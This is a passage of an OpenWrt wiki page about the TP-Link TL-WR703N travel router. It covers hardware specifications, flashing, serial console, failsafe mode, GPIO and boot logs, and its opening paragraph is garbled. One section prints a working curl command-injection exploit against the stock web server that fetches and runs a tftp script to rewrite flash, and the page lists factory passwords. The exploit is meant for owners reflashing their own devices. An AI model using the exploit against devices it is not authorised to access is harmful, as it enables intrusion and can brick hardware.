toh:tp-link:tl-wr703n

TP-Link TL-WR703N

3 N" on their website, only the "TL-WR70 2 N", which has no USB connector and 2 MB flash only, so it can't run OpenWrt. Alternatives are the same form factor as the TL-WR702N . TP-Link no longer list the "TL-WR70N" on their website, only the "TL-WR70N", which has no USB connector and 2flash only, so it can't run OpenWrt. Alternatives are the TL-WR710N or GL-AR150

It was the first device based on the Qualcomm Atheros AR9331 chipset to be ported to OpenWrt. Lot of general information overlaps with the Wiki pages of other AR9331-based devices

marketed as a "3G travel router" but non version actually includes a 3G/4G… modem. The marketing term rather means that the OEM firmware supports USB 3G modems because it contains drivers for USB modems! Ignore that, because with OpenWrt ANY router with USB supports 3G hardware…

Features: 802.11 b/g/n 150Mbps (130Mbps real) wireless power output 20dBm - 100mW 4 MB flash memory (can be modified for 16MB) 32 MB RAM (can be modified for 64MB) USB 2.0 port (High-Speed only, use an external High-Speed hub for Full/Low-Speed devices) Powered via micro-USB socket Tiny form factor: 5.7cm x 5.7cm x 1.8cm



Pictures

Clones

Device

Device in OpenWrt Database

Installation

Review the warnings below before you flash any images! Please see generic.flashing for a generic description of the OpenWrt installation process.

Building Custom Images

If you've got a modified version of this hardware which has 16MB of flash, then you will not be able to build images larger than 4MB, even though the bootloader will allow you to subsequently utilize all 16MB of flash (i.e. by adding packages after firstboot). See mb_flash_mod for how to solve this problem.

Warnings / Gotchas

Please check the firmware version first, either: in the Chinese webadmin interface: "Build 120925" correspond to a v1.7 firmware

on the internal sticker located on the Ethernet jack (may have 12B042)

DO NOT RELY ON THE VERSION GIVEN BY THE EXTERNAL STICKER ON CASE BOTTOM : it may report falsely "1.6", even if the firmware is actually a V1.7 WARNING If you have a V1.7 firmware, SOME OpenWrt trunks (e.g. r36641) will brick your router, unless you have access to the serial console! NEWER TRUNKS will install without issue via tftp and will work fine. Below is the version of the new bootloader (which disables the LAN port) of a version 1.7 hardware model (bought in December 2012). root@tpl2:~# grep -a U-Boot /dev/mtd0ro | cut -d'I' -f1 U-Boot 1.1.4 (Sep 25 2012 - 09:04:47) For more info visit this forum topic: https://forum.openwrt.org/viewtopic.php?id=40986 Firmware rev.140120 has admin1/admin1 set for web login/password

Power consumption

This router is standardly powered via USB at 5V. The voltage regulator inside is unknown, but its input voltage should be at least between 3.7V - 5.5V, but not over 5.5V. The device will get damaged at too high voltages*. Maximum current draw at 5V is 185mA (OpenWrt boot), average current draw with WiFi at 18dBm is 100mA, without WiFi 80mA. Hence the average router power consumption is 0.5W, which is incredibly low. Power consumption will be higher if a USB device is attached to its USB port! *Hint: If the router seems to be damaged because of a too high voltage, connect 3.3V _after_ the voltage regulator. This replaces the function of the damaged regulator, and the router works again. Be sure to power 5 volts into the micro-usb port at the same time if you want to have the usb port on the device work. More information and a rough diagram here http://img513.imageshack.us/img513/4295/saai.jpg

Serial console

The serial console connector does not utilise the regular TP-Link pinouts. Two pads labelled TP_OUT and TP_IN are the TX and RX signals. 115200 8n1. You have to connect your RS232-USB apdater also to the 5V pin on the board. Note that the pads can very easily be lifted. There is slightly more mechanical strength if you can solder to the surface-mount components to which the pads are connected–but this also takes care–your device could easily be destroyed. Make sure that your connection is secured so that tension cannot be applied to the solder points when you connect to an external device. TL-MR703n login: root password: 5up

Flashing

v1.6 and older: upload the latest stable version via the web interface (default: 192.168.1.1 / admin / admin). Note: that the factory default web interface won't accept a file with a long name. Rename it to openwrt.bin and you won't get a "23002 Error". v1.7 hardware running 3.17.1 Build 140120 Rel.56593n will reject OpenWrt installation via the web interface, install via tftp instead. Download latest squashfs-factory.bin for the initial flash. Use a "sysupgrade" file for any future updates if already on openwrt. To flash from the Chinese web interface, at the present time you would select the last menu item on the left, and then the third submenu item. This initiates a popup with two buttons–the upper right one allows you to browse to find the file you want to flash on your PC, the lower left one initiates the flash. When you roll over an item on the Chinese web interface, the rollover text will indicate which item you are selecting.

Failsafe mode

When the configuration no longer allows you to log in via any network connection (e.g. lost password), the OpenWrt failsafe mode can be entered via the single "Reset" button on the device. However, in contrast to the generic failsafe instructions, for the TL-WR703N you have to wait for ca. 10 (10-12) seconds before pushing the "Reset" button after powering on the device. If the button is pushed immediately after powering on, the single blue LED will start blinking, supposedly indicating some failsafe firmware recovery mody of the embedded bootloader (not yet discovered how to use it). In this mode, the OpenWrt failsafe is not being started. Instead, wait for slightly longer than 10 seconds and - as soon as the LED starts blinking for the first time after powering on the device, push the "Reset" button for ca. 1-2 seconds. Immediately afterwards, the LED will blink rapidly (multiple Hz) and OpenWrt will be in failsafe mode.

- The above didn't work on a Ver 1.6 box running OpenWrt r33312. To get into failsafe mode, power up the device and wait until the LED starts flashing (about 2Hz). Once it starts flashing (within about 4 seconds) then quickly press the button. The LED will then flash much faster and the device will be in failsafe mode.

Back to original image

Setup serial console 115200 8n1

Enter "tpl" as soon as U-Boot announces "Autobooting in 1 seconds"

Download the original image: http://www.tp-link.com.cn/download/2011930104462.rar extact to tftp folder

Setup your eth0 to 192.168.1.100, you can check detail by 'printenv'

Run below command under U-Boot: tftpboot 0x81000000 wr703nv1_cn_3_12_11_up(110926).bin erase 0x9f020000 +0x3c0000 cp.b 0x81000000 0x9f020000 0x3c0000 bootm 9f020000 Instructions on the forum for flashing wr703n with mr3020 firmware which is in english and not in chinese.

Detailed instructions on the forum for flashing Unbrick Tutorial with TFTP and Serial

Internal images

On first image you can see the serial connector labeled TP_IN and TP_OUT on the bottom right. GND is right next to it on the right pin of C55. on the Third image you have placement of GPIO, powers and some interesting things.. Hi Res images here : https://plus.google.com/u/0/photos/107211980242732541247/albums/5737162394063705409/5737162392085444242

TFTP Install Necessary on v1.7 hardware

I've setup over 15 of the v1.7 hardware nodes with Chaos Calmer trunk r45157, with some nodes running non-stop for weeks without issue. WiFi, USB and ethernet works great; mostly using the WR703n's to support VirtualHere USB-over-IP services. While this works great for me, this could brick your device: proceed at your own risk. Huge thanks to Interdev for the original sketch. Below are the specific steps that works beautifully for me.

Create Files

Obtain a static BusyBox binary: curl https://busybox.net/downloads/binaries/busybox-mips > busybox Download OpenWrt: curl https://downloads.openwrt.org/snapshots/trunk/ar71xx/generic/openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin -o openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin Cut the OpenWrt image into 2 parts (this could probably be made faster, or more space-efficient, but I haven't researched details): dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i1 bs=1 count=1048576 dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i2 bs=1 skip=1048576 Create a file named "aa", using the following contents. Don't forget to replace 192.168.0.9 with the IP of your tftp server. cd /tmp tftp -gl i1 192.168.0.9 tftp -gl i2 192.168.0.9 tftp -gl busybox 192.168.0.9 chmod 755 busybox ./busybox dd if=i1 of=/dev/mtdblock1 conv=fsync ./busybox dd if=i2 of=/dev/mtdblock2 conv=fsync reboot -f Now you should have 5 files in your TFTP server's folder: openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin

busybox

i1

i2

aa

Install OpenWrt

Use the following commands to install OpenWrt on a stock/factory Chinese v1.7 TL-WR703N running 3.17.1 Build 140120. Assuming you have a Linux or BSD-based TFTP server, just run the commands from there. DO NOT POWER OFF EQUIPMENT! INTERRUPTING IT WILL BRICK (and you need a 3.3V serial to revive it). Again, replace 192.168.0.9 with the IP of your TFTP server, and 192.168.0.100 with the IP assigned to the WR703N. Each of the following steps are necessary, don't skip them.

Set password to admin42

This is only necessary to complete the OpenWrt install, password will be reset to the default OpenWrt password upon completion of your install. curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true' 'http://192.168.0.100/'

Enable parental control

curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.0.100/userRpm/ParentCtrlRpm.htm' 'http://192.168.0.100/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1'

Now, exploit a vulnerability in the stock/factory httpd

The following exploit will run these commands on your WR703N: cd /tmp ; tftp -gl aa 192.168.0.9; sh aa DO NOT POWER OFF EQUIPMENT! INTERRUPTING THIS WILL BRICK THE WR703N! curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.0.100/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1' 'http://192.168.0.100/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.0.9;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6' Wait until the WR703N starts to blink; OpenWrt is now loading. Check your DHCP server, ARP table, or use nmap, to find the IP address. See OpenWrt – First Login for login instructions.

TL-WR703N Reverse Engineering

GPIOs

The AR933x platform provides 30 GPIOs. Some of them are used by the router for status LEDs, buttons and other stuff. The table below shows the results of investigations: GPIO Available on WR703N AR9331 Pin POR Value WR703N Name Description MR3020 Name 0 R4-E A78 0 Must have 0 value during bootstrap* WLAN LED/LED4 1 R2-S A77 1 Must have 1 value during bootstrap 2 VIA B49 SPI_CS_0 Used by SPI Flash SPI_CS_0 3 VIA B51 SPI_CLK Used by SPI Flash SPI_CLK 4 VIA A57 SPI_MOSI Used by SPI Flash SPI_MOSI 5 R57-S/R60-S B50 SPI_MISO Used by SPI Flash SPI_MISO 6 R16-S B46 LDO Connected to U6 LDO* LDO 7 R15-S A54 0 * 8 R18-E A52 USB_POWER Control USB Host Power USB_POWER 9 R82-N B68 1 TP_IN UART RXD TP_IN 10 C55-W A79 TP_OUT UART TXD TP_OUT 11 R92-E B48 RESET SW Soft Reset Switch WPS/RESET SW 12 VIA A56 0 Must have 0 value during bootstrap 13 R3-S B66 1 Must have 0 value during bootstrap 14 R11-N A76 0 Must have 0 value during bootstrap* 15 R12-N B65 0 Must have 0 value during bootstrap* 16 R13-N A75 0 Must have 0 value during bootstrap 17 R14-N B64 1 LAN LED/LED5 18 NC A28 N/A SLIDE SW1 19 20 NC A27 N/A SLIDE SW2 21 22 23 24 25 26 27 LED2-S/LED3-S B44 LED2/LED3 Blue PCB LED 3G LED/LED3 28 VIA A74 0 Must have 0 value during bootstrap 29 R17-S A53 0 * on wr703n these can be floating (i.e. resistors removed) and the unit still boots * on wr703n tried to pull up GPIO14 (after removing R11) with 10K, system won't boot, so let it pull down or floating

PCB details

You can get additional details on the PCB in the dedicated PCB Details Wiki page.

Boot log (OpenWrt)

U-Boot 1.1.4 (Aug 27 2011 - 10:39:39) > AP121-2MB (ar9330) U-boot > DRAM: 32 MB led turning on for 1s... id read 0x100000ff flash size 4194304, sector count = 64 Flash: 4 MB Using default environment > In: serial Out: serial Err: serial Net: ag7240_enet_initialize... No valid address in Flash. Using fixed address No valid address in Flash. Using fixed address : cfg1 0x5 cfg2 0x7114 eth0: 00:03:7f:09:0b:ad ag7240_phy_setup eth0 up : cfg1 0xf cfg2 0x7214 eth1: 00:03:7f:09:0b:ad athrs26_reg_init_lan ATHRS26: resetting s26 ATHRS26: s26 reset done ag7240_phy_setup eth1 up eth0, eth1 Autobooting in 1 seconds ## Booting image at 9f020000 ... Uncompressing Kernel Image ... OK > Starting kernel ... > Linux version 2.6.39.4 (juhosg@idared) (gcc version 4.5.4 20110808 (prerelease) (Linaro GCC 4.5-2011.08) ) #1 Tue Sep 20 14:44:37 CEST 2011 bootconsole [early0] enabled CPU revision is: 00019374 (MIPS 24Kc) SoC: Atheros AR9330 rev 1 Clocks: CPU:400.000MHz, DDR:400.000MHz, AHB:200.000MHz, Ref:25.000MHz Determined physical RAM map: memory: 02000000 @ 00000000 (usable) Initrd not found or empty - disabling initrd Zone PFN ranges: Normal 0x00000000 -> 0x00002000 Movable zone start PFN for each node early_node_map[1] active PFN ranges 0: 0x00000000 -> 0x00002000 Built 1 zonelists in Zone order, mobility grouping on. Total pages: 8128 Kernel command line: board=TL-WR703N console=ttyATH0,115200 rootfstype=squashfs,jffs2 noinitrd PID hash table entries: 128 (order: -3, 512 bytes) Dentry cache hash table entries: 4096 (order: 2, 16384 bytes) Inode-cache hash table entries: 2048 (order: 1, 8192 bytes) Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes. Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes Writing ErrCtl register=00000000 Readback ErrCtl register=00000000 Memory: 29376k/32768k available (2009k kernel code, 3392k reserved, 386k data, 180k init, 0k highmem) SLUB: Genslabs=9, HWalign=32, Order=0-3, MinObjects=0, CPUs=1, Nodes=1 NR_IRQS:80 Calibrating delay loop... 265.42 BogoMIPS (lpj=1327104) pid_max: default: 32768 minimum: 301 Mount-cache hash table entries: 512 NET: Registered protocol family 16 MIPS: machine is TP-LINK TL-WR703N v1 bio: create slab <bio-0> at 0 Switching to clocksource MIPS NET: Registered protocol family 2 IP route cache hash table entries: 1024 (order: 0, 4096 bytes) TCP established hash table entries: 1024 (order: 1, 8192 bytes) TCP bind hash table entries: 1024 (order: 0, 4096 bytes) TCP: Hash tables configured (established 1024 bind 1024) TCP reno registered UDP hash table entries: 256 (order: 0, 4096 bytes) UDP-Lite hash table entries: 256 (order: 0, 4096 bytes) NET: Registered protocol family 1 squashfs: version 4.0 (2009/01/31) Phillip Lougher JFFS2 version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc. msgmni has been set to 57 io scheduler noop registered io scheduler deadline registered (default) Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled ar933x-uart: ttyATH0 at MMIO 0x18020000 (irq = 11) is a AR933X UART console [ttyATH0] enabled, bootconsole disabled console [ttyATH0] enabled, bootconsole disabled Atheros AR71xx SPI Controller driver version 0.2.4 m25p80 spi0.0: found s25sl032a, expected m25p80 m25p80 spi0.0: s25sl032a (4096 Kbytes) Searching for RedBoot partition table in spi0.0 at offset 0x3e0000 Searching for RedBoot partition table in spi0.0 at offset 0x3f0000 No RedBoot partition table detected in spi0.0 spi0.0: no WRT160NL signature found Creating 5 MTD partitions on "spi0.0": 0x000000000000-0x000000020000 : "u-boot" 0x000000020000-0x000000120000 : "kernel" 0x000000120000-0x0000003f0000 : "rootfs" mtd: partition "rootfs" set to be root filesystem mtd: partition "rootfs_data" created automatically, ofs=2A0000, len=150000 0x0000002a0000-0x0000003f0000 : "rootfs_data" 0x0000003f0000-0x000000400000 : "art" 0x000000020000-0x0000003f0000 : "firmware" ag71xx_mdio: probed eth0: Atheros AG71xx at 0xb9000000, irq 4 Atheros AR71xx hardware watchdog driver version 0.1.0 TCP westwood registered NET: Registered protocol family 17 802.1Q VLAN Support v1.8 Ben Greear <greearb@candelatech.com> All bugs added by David S. Miller <davem@redhat.com> VFS: Mounted root (squashfs filesystem) readonly on device 31:2. Freeing unused kernel memory: 180k freed linput: gpio-keys-polled as /devices/platform/gpio-keys-polled/input/input0 Button Hotplug driver version 0.4.1 - preinit - Press the [f] key and hit [enter] to enter failsafe mode eth0: link up (100Mbps/Full duplex) - regular preinit - JFFS2 notice: (371) jffs2_build_xattr_subsystem: complete building xattr subsystem, 17 of xdatum (0 unchecked, 16 orphan) and 30 of xref (0 dead, 16 orphan) found. switching to jffs2 - init - > Please press Enter to activate this console. eth0: link down device eth0 entered promiscuous mode Compat-wireless backport release: compat-wireless-2011-08-25 Backport based on wireless-testing.git master-2011-09-14 cfg80211: Calling CRDA to update world regulatory domain eth0: link up (100Mbps/Full duplex) br-lan: port 1(eth0) entering forwarding state br-lan: port 1(eth0) entering forwarding state SCSI subsystem initialized usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb cfg80211: World regulatory domain updated: cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp) cfg80211: (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2000 mBm) cfg80211: (2457000 KHz - 2482000 KHz @ 20000 KHz), (300 mBi, 2000 mBm) cfg80211: (2474000 KHz - 2494000 KHz @ 20000 KHz), (300 mBi, 2000 mBm) cfg80211: (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 2000 mBm) cfg80211: (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 2000 mBm) ieee80211 phy0: Atheros AR9330 Rev:1 mem=0xb8100000, irq=2 cfg80211: Calling CRDA for country: US PPP generic driver version 2.4.2 ip_tables: (C) 2000-2006 Netfilter Core Team cfg80211: Regulatory domain changed to country: US cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp) cfg80211: (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2700 mBm) cfg80211: (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 1700 mBm) cfg80211: (5250000 KHz - 5330000 KHz @ 40000 KHz), (300 mBi, 2000 mBm) cfg80211: (5490000 KHz - 5600000 KHz @ 40000 KHz), (300 mBi, 2000 mBm) cfg80211: (5650000 KHz - 5710000 KHz @ 40000 KHz), (300 mBi, 2000 mBm) cfg80211: (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 3000 mBm) NET: Registered protocol family 24 ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver ar71xx-ehci ar71xx-ehci: Atheros AR91xx built-in EHCI controller ar71xx-ehci ar71xx-ehci: new USB bus registered, assigned bus number 1 ar71xx-ehci ar71xx-ehci: irq 3, io mem 0x1b000000 ar71xx-ehci ar71xx-ehci: USB 2.0 started, EHCI 1.00 hub 1-0:1.0: USB hub found hub 1-0:1.0: 1 port detected nf_conntrack version 0.5.0 (461 buckets, 1844 max) usb 1-1: new high speed USB device number 2 using ar71xx-ehci ohci_hcd: USB 1.1 'Open' Host Controller (OHCI) Driver Initializing USB Mass Storage driver... scsi0 : usb-storage 1-1:1.0 usbcore: registered new interface driver usb-storage USB Mass Storage support registered. scsi 0:0:0:0: Direct-Access Kingston DataTraveler 2.0 1.00 PQ: 0 ANSI: 2 sd 0:0:0:0: [sda] 7856128 512-byte logical blocks: (4.02 GB/3.74 GiB) sd 0:0:0:0: [sda] Write Protect is off sd 0:0:0:0: [sda] Assuming drive cache: write through sd 0:0:0:0: [sda] Assuming drive cache: write through sda: sda1 sd 0:0:0:0: [sda] Assuming drive cache: write through sd 0:0:0:0: [sda] Attached SCSI removable disk > > > BusyBox v1.18.5 (2011-09-17 19:36:07 CEST) built-in shell (ash) Enter 'help' for a list of built-in commands. > _______ ________ __ | |.-----.-----.-----.| | | |.----.| |_ | - || _ | -__| || | | || _|| _| |_______|| __|_____|__|__||________||__| |____| |__| W I R E L E S S F R E E D O M ATTITUDE ADJUSTMENT (bleeding edge, r28258) ---------- * 1/4 oz Vodka Pour all ingredients into mixing * 1/4 oz Gin tin with ice, strain into glass. * 1/4 oz Amaretto * 1/4 oz Triple sec * 1/4 oz Peach schnapps * 1/4 oz Sour mix * 1 splash Cranberry juice ----------------------------------------------------- root@OpenWrt:/# cat /proc/cpuinfo system type : Atheros AR9330 rev 1 machine : TP-LINK TL-WR703N v1 processor : 0 cpu model : MIPS 24Kc V7.4 BogoMIPS : 265.42 wait instruction : yes microsecond timers : yes tlb_entries : 16 extra interrupt vector : yes hardware watchpoint : yes, count: 4, address/irw mask: [0x0000, 0x0ff8, 0x0ff8, 0x0ff8] ASEs implemented : mips16 shadow register sets : 1 kscratch registers : 0 core : 0 VCED exceptions : not available VCEI exceptions : not available > root@OpenWrt:/#



Boot log (Factory)

U-Boot 1.1.4 (Aug 27 2011 - 10:39:39) AP121-2MB (ar9330) U-boot DRAM: 32 MB led turning on for 1s... id read 0x100000ff flash size 4194304, sector count = 64 Flash: 4 MB Using default environment In: serial Out: serial Err: serial Net: ag7240_enet_initialize... No valid address in Flash. Using fixed address No valid address in Flash. Using fixed address : cfg1 0x5 cfg2 0x7114 eth0: 00:03:7f:09:0b:ad ag7240_phy_setup eth0 up : cfg1 0xf cfg2 0x7214 eth1: 00:03:7f:09:0b:ad athrs26_reg_init_lan ATHRS26: resetting s26 ATHRS26: s26 reset done ag7240_phy_setup eth1 up eth0, eth1 Autobooting in 1 seconds ## Booting image at 9f020000 ... Uncompressing Kernel Image ... OK Starting kernel ... Booting AR9330(Hornet)... Linux version 2.6.31--LSDK-9.2.0.312 (root@bogon) (gcc version 4.3.3 (GCC) ) #128 Fri Aug 26 14:58:53 CST 2011 flash_size passed from bootloader = 4 CPU revision is: 00019374 (MIPS 24Kc) Determined physical RAM map: memory: 02000000 @ 00000000 (usable) User-defined physical RAM map: memory: 02000000 @ 00000000 (usable) Zone PFN ranges: Normal 0x00000000 -> 0x00002000 Movable zone start PFN for each node early_node_map[1] active PFN ranges 0: 0x00000000 -> 0x00002000 Built 1 zonelists in Zone order, mobility grouping on. Total pages: 8128 Kernel command line: console=ttyS0,115200 root=31:02 rootfstype=squashfs init=/sbin/init mtdparts=ar7240-nor0:128k(u-boot),1024k(kernel),2816(rootfs),64k(config),64k(ART) mem=32M PID hash table entries: 128 (order: 7, 512 bytes) Dentry cache hash table entries: 4096 (order: 2, 16384 bytes) Inode-cache hash table entries: 2048 (order: 1, 8192 bytes) Primary instruction cache 64kB, VIPT, 4-way, linesize 32 bytes. Primary data cache 32kB, 4-way, VIPT, cache aliases, linesize 32 bytes Writing ErrCtl register=00000000 Readback ErrCtl register=00000000 Memory: 29864k/32768k available (1888k kernel code, 2904k reserved, 524k data, 116k init, 0k highmem) Hierarchical RCU implementation. NR_IRQS:128 plat_time_init: plat time init done Calibrating delay loop... 266.24 BogoMIPS (lpj=532480) Mount-cache hash table entries: 512 NET: Registered protocol family 16 ===== ar7240_platform_init: 0 Whoops! This kernel is for product wr703 v1.0! bio: create slab <bio-0> at 0 SCSI subsystem initialized usbcore: registered new interface driver usbfs usbcore: registered new interface driver hub usbcore: registered new device driver usb NET: Registered protocol family 2 IP route cache hash table entries: 1024 (order: 0, 4096 bytes) TCP established hash table entries: 1024 (order: 1, 8192 bytes) TCP bind hash table entries: 1024 (order: 0, 4096 bytes) TCP: Hash tables configured (established 1024 bind 1024) TCP reno registered NET: Registered protocol family 1 AR7240 GPIOC major 0 squashfs: version 4.0 (2009/01/31) Phillip Lougher NTFS driver 2.1.29 [Flags: R/O]. msgmni has been set to 58 alg: No test for lzma (lzma-generic) alg: No test for stdrng (krng) io scheduler noop registered io scheduler anticipatory registered io scheduler deadline registered io scheduler cfq registered (default) Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled ttyS0: detected caps 00000000 should be 00000100 serial8250.0: ttyS0 at MMIO 0xb8020000 (irq = 19) is a 16550A console [ttyS0] enabled PPP generic driver version 2.4.2 NET: Registered protocol family 24 cmdlinepart partition parsing not available set partition boot set partition kernel set partition rootfs set partition config set partition art set partition arching for RedBoot partition table 5 RedBoot partitions found on MTD device ar7240-nor0 Creating 5 MTD partitions on "ar7240-nor0": 0x000000000000-0x000000020000 : "boot" 0x000000020000-0x000000120000 : "kernel" 0x000000120000-0x0000003e0000 : "rootfs" 0x0000003e0000-0x0000003f0000 : "config" 0x0000003f0000-0x000000400000 : "art" ->Oops: flash id 0x10215 . ehci_hcd: USB 2.0 'Enhanced' Host Controller (EHCI) Driver Port Status 1c000004 ar7240-ehci ar7240-ehci.0: ATH EHCI ar7240-ehci ar7240-ehci.0: new USB bus registered, assigned bus number 1 ehci_reset Intialize USB CONTROLLER in host mode: 3 ehci_reset Port Status 1c000000 ar7240-ehci ar7240-ehci.0: irq 3, io mem 0x1b000000 ehci_reset Intialize USB CONTROLLER in host mode: 3 ehci_reset Port Status 1c000000 ar7240-ehci ar7240-ehci.0: USB 2.0 started, EHCI 1.00 usb usb1: configuration #1 chosen from 1 choice hub 1-0:1.0: USB hub found hub 1-0:1.0: 1 port detected TCP cubic registered NET: Registered protocol family 17 802.1Q VLAN Support v1.8 Ben Greear <greearb@candelatech.com> All bugs added by David S. Miller <davem@redhat.com> ar7240wdt_init: Registering WDT success VFS: Mounted root (squashfs filesystem) readonly on device 31:2. Freeing unused kernel memory: 116k freed ====>slow_led_expire 621: here ===>slow_led_expire 625: off init started: BusyBox v1.01 (2011.04.01-07:49+0000) multi-call binary ====>slow_led_expire 621: here ===>slow_led_expire 636: on This Board use 2.6.31 xt_time: kernel timezone is -0000 nf_conntrack version 0.5.0 (512 buckets, 5120 max) ====>slow_led_expire 621: here ===>slow_led_expire 625: off ip_tables: (C) 2000-2006 Netfilter Core Team insmod: cannot open module `/lib/modules/2.6.31/kernel/iptable_raw.ko': No such file or directory ====>slow_led_expire 621: here ===>slow_led_expire 636: on insmod: cannot open module `/lib/modules/2.6.31/kernel/flashid.ko': No such file or directory PPPoL2TP kernel driver, V1.0 PPTP driver version 0.8.3 insmod: cannot open module `/lib/modules/2.6.31/kernel/harmony.ko': No such file or directory ====>slow_led_expire 621: here ===>slow_led_expire 625: off (none) mips #128 Fri Aug 26 14:58:53 CST 2011 (none) (none) login: Now flash open! Now flash open! ====>slow_led_expire 621: here ===>slow_led_expire 636: on ATHR_GMAC: Length per segment 1536 ATHR_GMAC: fifo cfg 3 01f00140 ATHR_GMAC: Mac address for unit 1:bf1f0006 ATHR_GMAC: 12:64:c3:58:67:a4 ATHR_GMAC: Max segments per packet : 1 ATHR_GMAC: Max tx descriptor count : 40 ATHR_GMAC: Max rx descriptor count : 96 ATHR_GMAC: Mac capability flags : 4D83 ATHR_GMAC: Mac address for unit 0:bf1f0000 ATHR_GMAC: 01:9c:b5:c8:b7:c9 ====>slow_led_expire 621: here ===>slow_led_expire 625: off ATHR_GMAC: Max segments per packet : 1 ATHR_GMAC: Max tx descriptor count : 40 ATHR_GMAC: Max rx descriptor count : 252 ATHR_GMAC: Mac capability flags : 4403 athr_gmac_ring_alloc Allocated 640 at 0x81e77800 athr_gmac_ring_alloc Allocated 4032 at 0x81d63000 Setting Drop CRC Errors, Pause Frames and Length Error frames Setting PHY...mac 0 ====>slow_led_expire 621: here ===>slow_led_expire 636: on ====>slow_led_expire 621: here ===>slow_led_expire 625: off ====>slow_led_expire 621: here ===>slow_led_expire 636: on athr_gmac_ring_alloc Allocated 640 at 0x81e77400 athr_gmac_ring_alloc Allocated 1536 at 0x81f25000 ====>slow_led_expire 621: here ===>slow_led_expire 625: off ====>slow_led_expire 621: here ===>slow_led_expire 636: on athr_gmac_mii_setup: MDC check failed Setting Drop CRC Errors, Pause Frames and Length Error frames ATHRS26: resetting s26 ATHRS26: s26 reset done Setting PHY...mac 1 ====>slow_led_expire 621: here ===>slow_led_expire 625: off device eth0 entered promiscuous mode Now flash open! ====>slow_led_expire 621: here ===>slow_led_expire 636: on ====>slow_led_expire 621: here ===>slow_led_expire 625: off ====>slow_led_expire 621: here ===>slow_led_expire 636: on nf_conntrack_rtsp v0.6.21 loading nf_nat_rtsp v0.6.21 loading ====>slow_led_expire 621: here ===>slow_led_expire 625: off asf: module license 'Proprietary' taints kernel. Disabling lock debugging due to kernel taint ====>slow_led_expire 621: here ===>slow_led_expire 636: on ath_hal: 0.9.17.1 (AR9380, DEBUG, REGOPS_FUNC, WRITE_EEPROM, 11D) ath_rate_atheros: Copyright (c) 2001-2005 Atheros Communications, Inc, All Rights Reserved ath_dev: Copyright (c) 2001-2007 Atheros Communications, Inc, All Rights Reserved ====>slow_led_expire 621: here ===>slow_led_expire 625: off ====>slow_led_expire 621: here ath_ahb: 9.2.0_U5.508 (Atheros/multi-bss) Boostrap clock 25MHz ar9300RadioAttach: Need analog access recipe!! Restoring Cal data from Flash ath_get_caps[4735] rx chainmask mismatch actual 1 sc_chainmak 0 ath_get_caps[4710] tx chainmask mismatch actual 1 sc_chainmak 0 wifi0: Atheros 9380: mem=0xb8100000, irq=2 wlan_vap_create : enter. devhandle=0x80c042c0, opmode=IEEE80211_M_HOSTAP, flags=0x1 wlan_vap_create : exit. devhandle=0x80c042c0, opmode=IEEE80211_M_HOSTAP, flags=0x1. VAP device ath0 created DES SSID SET=TP-LINK_620550 ieee80211_scan_unregister_event_handler: Failed to unregister evhandler=c0a048a0 arg=81fa8ac0 wlan_vap_delete : enter. vaphandle=0x80e60000 wlan_vap_delete : exit. vaphandle=0x80e60000 wlan_vap_create : enter. devhandle=0x80c042c0, opmode=IEEE80211_M_HOSTAP, flags=0x1 wlan_vap_create : exit. devhandle=0x80c042c0, opmode=IEEE80211_M_HOSTAP, flags=0x1. VAP device ath0 created DES SSID SET=TP-LINK_620550 ieee80211_ioctl_siwmode: imr.ifm_active=393856, new mode=3, valid=1 WARNING: Fragmentation with HT mode NOT ALLOWED!! device ath0 entered promiscuous mode br0: port 2(ath0) entering forwarding state ieee80211_ioctl_siwmode: imr.ifm_active=1442432, new mode=3, valid=1 br0: port 2(ath0) entering disabled state DES SSID SET=TP-LINK_620550 br0: port 2(ath0) entering forwarding state



MTD

cat /proc/mtd dev: size erasesize name mtd0: 00020000 00010000 "u-boot" mtd1: 000d9fa8 00010000 "kernel" mtd2: 002f6058 00010000 "rootfs" mtd3: 000f0000 00010000 "rootfs_data" mtd4: 00010000 00010000 "art" mtd5: 003d0000 00010000 "firmware"

USB port and monitoring Serial Console via USB-Serial

